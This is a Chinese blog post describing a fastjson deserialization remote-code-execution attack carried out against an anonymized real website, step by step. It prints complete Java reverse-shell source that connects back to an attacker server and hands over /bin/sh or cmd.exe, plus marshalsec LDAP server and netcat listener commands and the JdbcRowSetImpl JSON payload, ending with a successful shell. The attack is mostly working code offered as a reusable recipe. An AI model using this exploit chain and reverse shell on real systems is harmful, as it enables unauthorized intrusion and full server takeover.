• fastjson反序列化漏洞实际案例利用


      fastjson反序列化rce实际案例利用全过程:

      存在问题网站:http://***.com/

      在网站上寻找一些安全漏洞的时候,发现一条json数据包

      数据包如下:

        

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"***":"***"}

      当我尝试输入:'a

        

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"***":"***'a"}

      发生了报错,报错信息:

      {"timestamp":1556677012822,"status":500,"error":"Internal Server Error","exception":"com.****.fastjson.JSONException.....}

      fastjson,立马想到fastjson反序列化漏洞。

      关于利用:需要两份文件

      1.reverse.java

      2.marshalsec-0.0.1-SNAPSHOT-all.jar

      提供reverse.java的代码:

      

    import java.io.BufferedReader;
    import java.io.BufferedWriter;
    import java.io.InputStream;
    import java.io.InputStreamReader;
    import java.io.OutputStream;
    import java.io.OutputStreamWriter;
    import java.net.Socket;
    
    public class reverse {
        class StreamConnector
          extends Thread
        {
          InputStream hx;
          OutputStream il;
          
          StreamConnector(InputStream hx, OutputStream il)
          {
            this.hx = hx;
            this.il = il;
          }
          
          public void run()
          {
            BufferedReader ar = null;
            BufferedWriter slm = null;
            try
            {
              ar = new BufferedReader(new InputStreamReader(this.hx));
              slm = new BufferedWriter(new OutputStreamWriter(this.il));
              char[] buffer = new char[8192];
              int length;
              while ((length = ar.read(buffer, 0, buffer.length)) > 0)
              {
                slm.write(buffer, 0, length);
                slm.flush();
              }
            }
            catch (Exception localException) {}
            try
            {
              if (ar != null) {
                ar.close();
              }
              if (slm != null) {
                slm.close();
              }
            }
            catch (Exception localException1) {}
          }
        }
        public reverse()
          {
            reverseConn("服务器ip:端口号");
          }
          
         public static void main(String[] args) 
        {
            System.out.println("0");
        }
    
          public void reverseConn(String ip)
          {
            String ipport = ip;
            try
            {
              String ShellPath;
              if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
                ShellPath = new String("/bin/sh");
              } else {
                ShellPath = new String("cmd.exe");
              }
              Socket socket = new Socket(ipport.split(":")[0], 
                Integer.parseInt(ipport.split(":")[1]));
              Process process = Runtime.getRuntime().exec(ShellPath);
              new StreamConnector(process.getInputStream(), 
                socket.getOutputStream()).start();
              new StreamConnector(process.getErrorStream(), 
                socket.getOutputStream()).start();
              new StreamConnector(socket.getInputStream(), 
                process.getOutputStream()).start();
            }
            catch (Exception e)
            {
              e.printStackTrace();
            }
          }
    }

      marshalsec-0.0.1-SNAPSHOT-all.jar网上可自行找到。

      测试服务器:阿里云服务器(CenterOS)

      需要具备的环境:1.jdk 1.8环境   2.apache服务 3.无apache自带python启动web服务

      jdk1.8安装参考:https://blog.51cto.com/kmt1994/2325949?source=dra

      apache服务配置嫌麻烦直接使用:  python -m SimpleHTTPServer 8000(以8000端口为例子),如果配置了apache访问是默认80端口

      访问http://服务器ip:8000 or http://服务器ip:80

      没apache(web)服务的操作过程如下:

      把reverse.java和marshalsec-0.0.1-SNAPSHOT-all.jar放到网站根目录下:

      操作1: javac reverse.java 生成reverse.class

      操作2: python -m SimpleHTTPServer 8000开启一个8000端口的web服务

      操作3: 新建窗口:nc -lvvp 1234   *监听的端口根据reverse.java中的端口进行配置互相匹配

      操作4:新建窗口:java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://服务器ip:8000/#reverse  10086

      操作5:构造数据包:

      

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://服务器ip:10086/Object","autoCommit":true}

      发送数据包产生了一定延迟,查看操作3的窗口发现:

      反弹shell成功

      

      如果有apache服务,那么操作如下:

      操作1.在网站根目录下存放那两个文件,我的网站根目录/var/www/html

      操作2.javac reverse.java 生成reverse.class

      操作3.新建窗口:nc -lvvp 1234   *监听的端口根据reverse.java中的端口进行配置互相匹配  

      操作4:新建窗口:java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://服务器ip:80/#reverse  10086 *(apache服务端口默认80)

      操作5:构造数据包:

        

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://服务器ip:10086/Object","autoCommit":true}

      发包产生延迟,然后查看操作3窗口:

      成功反弹shell

      

      关于坑:要在网站根目录下进行这些命令操作!

        

  • 相关阅读:
    如何实现LRU缓存淘汰算法
    排序算法(上)
    MySQL为什么有时候会选错索引?
    mysql开启慢查询——wamp
    普通索引和唯一索引,应该如何选择
    php开发常用插件
    mysql批量添加大量测试数据
    .text()设置文本,.html()设置html, .val()设置值的使用
    ajax .load()方法
    jquery学习笔记一之window.onload与$(document).ready()区别
  • 原文地址:https://www.cnblogs.com/piaomiaohongchen/p/10799466.html
Copyright © 2020-2023  润新知